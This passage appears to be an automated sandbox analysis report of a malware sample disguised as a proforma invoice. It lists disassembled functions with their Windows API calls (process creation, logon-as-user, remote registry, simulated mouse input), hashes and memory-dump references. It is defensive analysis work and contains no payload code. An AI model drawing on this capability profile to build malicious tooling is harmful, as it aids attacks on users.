                                                                                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3567560977-0
                                                                                                                    • Opcode ID: 34f01b63fff39e5947112d06a84c2d6da3a0eecf14c08b91078bb2c7975e97d6
                                                                                                                    • Instruction ID: 83e55f63ed2581282c60d793a00a238e5173b3ea5ce22eeb1904cbf23f4f498f
                                                                                                                    • Opcode Fuzzy Hash: 34f01b63fff39e5947112d06a84c2d6da3a0eecf14c08b91078bb2c7975e97d6
                                                                                                                    • Instruction Fuzzy Hash: 61F0963263A72259E734BB747C07A4A27959F03734F20CA1AF45CC50D2FF3084E14960
                                                                                                                    Function 002DB635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002DB644
                                                                                                                    • _memset.LIBCMT ref: 002DB653
                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00316F20,00316F64), ref: 002DB682
                                                                                                                    • CloseHandle.KERNEL32 ref: 002DB694
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                                                                    • String ID: o1$do1
                                                                                                                    • API String ID: 3277943733-3825723036
                                                                                                                    • Opcode ID: c4d1899cfb2d5b3c9dda706a43acfa332b68c0dadb1a4df7dce26bdccb452187
                                                                                                                    • Instruction ID: 0b8b835bd7008bb5d3fc5e7d77133006a3da55345f137a9f7460e74f2ec0e285
                                                                                                                    • Opcode Fuzzy Hash: c4d1899cfb2d5b3c9dda706a43acfa332b68c0dadb1a4df7dce26bdccb452187
                                                                                                                    • Instruction Fuzzy Hash: B0F054B1551300BBE21127A57C07FFB3B9DEB0C355F008061FA09D5191D7718C11CBA8
                                                                                                                    Function 0027406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00273F85), ref: 00274085
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0027408C
                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 00274097
                                                                                                                    • DecodePointer.KERNEL32(00273F85), ref: 002740B2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                                                    • API String ID: 3489934621-2819208100
                                                                                                                    • Opcode ID: e3344874005c3a356aa0881d59be4144ea0c08959088e8efae2ef65ba6152858
                                                                                                                    • Instruction ID: f37ce0fa30c3043491e8ac99045517f249599a56360126882cac204f398260e2
                                                                                                                    • Opcode Fuzzy Hash: e3344874005c3a356aa0881d59be4144ea0c08959088e8efae2ef65ba6152858
                                                                                                                    • Instruction Fuzzy Hash: 10E0BF70997341FFEB92BF61FD0DB453BA8B708742F108076F506E11A0CBB64A24CA18
                                                                                                                    Function 002B64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$__itow__swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3253778849-0
                                                                                                                    • Opcode ID: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                                                                                    • Instruction ID: 9bd75adb09277f705091d158992476ab53fef18e700478996e6ada80e7cdb2c0
                                                                                                                    • Opcode Fuzzy Hash: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                                                                                    • Instruction Fuzzy Hash: 3E619C3052065A9BCF11EF60CC85EFE37A9AF09348F044518FD595B192DB38E869CF54
                                                                                                                    Function 002D01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                      • Part of subcall function 002D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002CFDAD,?,?), ref: 002D0E31
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D02BD
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D02FD
                                                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 002D0320
                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002D0349
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 002D038C
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 002D0399
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4046560759-0
                                                                                                                    • Opcode ID: 8f23102f17b9781a34443fefaf0e96b8a206a6ea8b69081c2b7c03ed3671afa4
                                                                                                                    • Instruction ID: d032fb44d9db89ab7f88835608c51c02790dd62742c563632214a676fb90e54c
                                                                                                                    • Opcode Fuzzy Hash: 8f23102f17b9781a34443fefaf0e96b8a206a6ea8b69081c2b7c03ed3671afa4
                                                                                                                    • Instruction Fuzzy Hash: D4514831528201AFC714EF64D889E6ABBE8FF85314F04491EF945872A2DB31ED29CF56
                                                                                                                    Function 002D5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetMenu.USER32(?), ref: 002D57FB
                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 002D5832
                                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002D585A
                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 002D58C9
                                                                                                                    • GetSubMenu.USER32(?,?), ref: 002D58D7
                                                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 002D5928
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 650687236-0
                                                                                                                    • Opcode ID: 256af42be4f33772dc98f400799c789a24d43bdd89c8ae9270e5b242396ec066
                                                                                                                    • Instruction ID: 5c070304e1cd78b8bebbab25e676aa1e20a6fca63ebbdccd763b076d9932fd5a
                                                                                                                    • Opcode Fuzzy Hash: 256af42be4f33772dc98f400799c789a24d43bdd89c8ae9270e5b242396ec066
                                                                                                                    • Instruction Fuzzy Hash: 44516C31E11A25EFCF11DF64C845AAEB7B4EF48320F144066ED16AB351CBB0AE919F94
                                                                                                                    Function 002AEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 002AEF06
                                                                                                                    • VariantClear.OLEAUT32(00000013), ref: 002AEF78
                                                                                                                    • VariantClear.OLEAUT32(00000000), ref: 002AEFD3
                                                                                                                    • _memmove.LIBCMT ref: 002AEFFD
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 002AF04A
                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002AF078
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1101466143-0
                                                                                                                    • Opcode ID: c7d60a062987156f16c79c4c6eb444e7222b7d971a04b2d5b160d8d4030fffd3
                                                                                                                    • Instruction ID: f293fbb4386ed74e1c986fa1fd68ea0015b0f930c38a15fcc906cb342ed794bf
                                                                                                                    • Opcode Fuzzy Hash: c7d60a062987156f16c79c4c6eb444e7222b7d971a04b2d5b160d8d4030fffd3
                                                                                                                    • Instruction Fuzzy Hash: A3517AB5A10209EFDB10CF58C884AAAB7B8FF4D314B15856AED49DB305E734E911CFA0
                                                                                                                    Function 002B220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002B2258
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B22A3
                                                                                                                    • IsMenu.USER32(00000000), ref: 002B22C3
                                                                                                                    • CreatePopupMenu.USER32 ref: 002B22F7
                                                                                                                    • GetMenuItemCount.USER32(000000FF), ref: 002B2355
                                                                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 002B2386
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3311875123-0
                                                                                                                    • Opcode ID: 7cdad829114c939fd546a5d82074906a604b38671ed9626284c4fb097706dbc2
                                                                                                                    • Instruction ID: 0d8e5b7b5f9bf6b768f9ab0addc2d7d6596bbd5ba0e8acfd9d0d21ecae57ec4f
                                                                                                                    • Opcode Fuzzy Hash: 7cdad829114c939fd546a5d82074906a604b38671ed9626284c4fb097706dbc2
                                                                                                                    • Instruction Fuzzy Hash: 0B51C070A2130ADFDF21CF64D988BEDBBF5EF45394F1041A9E811A72A0D3749968CB51
                                                                                                                    Function 00251765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623
                                                                                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 0025179A
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 002517FE
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0025181B
                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0025182C
                                                                                                                    • EndPaint.USER32(?,?), ref: 00251876
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1827037458-0
                                                                                                                    • Opcode ID: 182190091855448c9f3fa8371ee539d8765af20d997b773ba7d5f069866893e2
                                                                                                                    • Instruction ID: 90be7d487e8ffe49da7ab78c36e1d8274d34cb75403d4e8d40835a4c613bcac9
                                                                                                                    • Opcode Fuzzy Hash: 182190091855448c9f3fa8371ee539d8765af20d997b773ba7d5f069866893e2
                                                                                                                    • Instruction Fuzzy Hash: D541CF30611301EFD721DF24DC88FBA7BE8EB49325F044669F9A5872A1C7309C69DB65
                                                                                                                    Function 002DB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(003157B0,00000000,00C26378,?,?,003157B0,?,002DB5A8,?,?), ref: 002DB712
                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 002DB736
                                                                                                                    • ShowWindow.USER32(003157B0,00000000,00C26378,?,?,003157B0,?,002DB5A8,?,?), ref: 002DB796
                                                                                                                    • ShowWindow.USER32(00000000,00000004,?,002DB5A8,?,?), ref: 002DB7A8
                                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 002DB7CC
                                                                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 002DB7EF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 642888154-0
                                                                                                                    • Opcode ID: 8d19ec214c2f86cb1ea7771e899cc73b63d40e0bc253ed2d65c69af6e6f556ea
                                                                                                                    • Instruction ID: c960cc68a1ddb6aa0b5347fa4f33061c051d22d19ca89cd53fe2977bb9cd8c34
                                                                                                                    • Opcode Fuzzy Hash: 8d19ec214c2f86cb1ea7771e899cc73b63d40e0bc253ed2d65c69af6e6f556ea
                                                                                                                    • Instruction Fuzzy Hash: C4419135601241EFEB22CF24C5A9B94BBE0FF45310F1941BAE9598F7A2C731AC66CB50
                                                                                                                    Function 002C709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,002C4E41,?,?,00000000,00000001), ref: 002C70AC
                                                                                                                      • Part of subcall function 002C39A0: GetWindowRect.USER32(?,?), ref: 002C39B3
                                                                                                                    • GetDesktopWindow.USER32 ref: 002C70D6
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 002C70DD
                                                                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 002C710F
                                                                                                                      • Part of subcall function 002B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B52BC
                                                                                                                    • GetCursorPos.USER32(?), ref: 002C713B
                                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002C7199
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4137160315-0
                                                                                                                    • Opcode ID: c2e5ab67ec11b5362e5ad87c07e7392d809fd39722aae57d0782c7419e7f3f3b
                                                                                                                    • Instruction ID: 171b5e2d6b1542c28f207115784257fdb265bb3225ebb143289242533de0fc5a
                                                                                                                    • Opcode Fuzzy Hash: c2e5ab67ec11b5362e5ad87c07e7392d809fd39722aae57d0782c7419e7f3f3b
                                                                                                                    • Instruction Fuzzy Hash: 1B31E172509306ABD720DF14D849F9BB7E9FB88314F040A1AF98997191C670EA18CF96
                                                                                                                    Function 002A8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002A80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002A80C0
                                                                                                                      • Part of subcall function 002A80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002A80CA
                                                                                                                      • Part of subcall function 002A80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002A80D9
                                                                                                                      • Part of subcall function 002A80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002A80E0
                                                                                                                      • Part of subcall function 002A80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002A80F6
                                                                                                                    • GetLengthSid.ADVAPI32(?,00000000,002A842F), ref: 002A88CA
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 002A88D6
                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 002A88DD
                                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 002A88F6
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,002A842F), ref: 002A890A
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 002A8911
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3008561057-0
                                                                                                                    • Opcode ID: 083b114b9cb70c789b518ab7e616721966c1031f233da16946e5c06dc0a85d00
                                                                                                                    • Instruction ID: d853bbdcf565f8f558400078712e14031a1e056b535e26557866a23de2d5fe56
                                                                                                                    • Opcode Fuzzy Hash: 083b114b9cb70c789b518ab7e616721966c1031f233da16946e5c06dc0a85d00
                                                                                                                    • Instruction Fuzzy Hash: 7011AF7192220AFFDB509FA4DD09BBF7778EB46311F148029E84697210CF369E24DB60
                                                                                                                    Function 002A85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002A85E2
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 002A85E9
                                                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 002A85F8
                                                                                                                    • CloseHandle.KERNEL32(00000004), ref: 002A8603
                                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002A8632
                                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 002A8646
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1413079979-0
                                                                                                                    • Opcode ID: 480d3f20842d93a19eb900bbe48e8ebc86c02ef720ad4b8d889015d922733727
                                                                                                                    • Instruction ID: 588d4b51d456f393920e2604bebaa7e1daa92af254920b7786420840f90b4441
                                                                                                                    • Opcode Fuzzy Hash: 480d3f20842d93a19eb900bbe48e8ebc86c02ef720ad4b8d889015d922733727
                                                                                                                    • Instruction Fuzzy Hash: BD117F7290124EABEF01CFA4ED49FDE7BA9EF09704F044065FE05A2160CB718D60DB60
                                                                                                                    Function 002AB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 002AB7B5
                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 002AB7C6
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002AB7CD
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 002AB7D5
                                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 002AB7EC
                                                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 002AB7FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1035833867-0
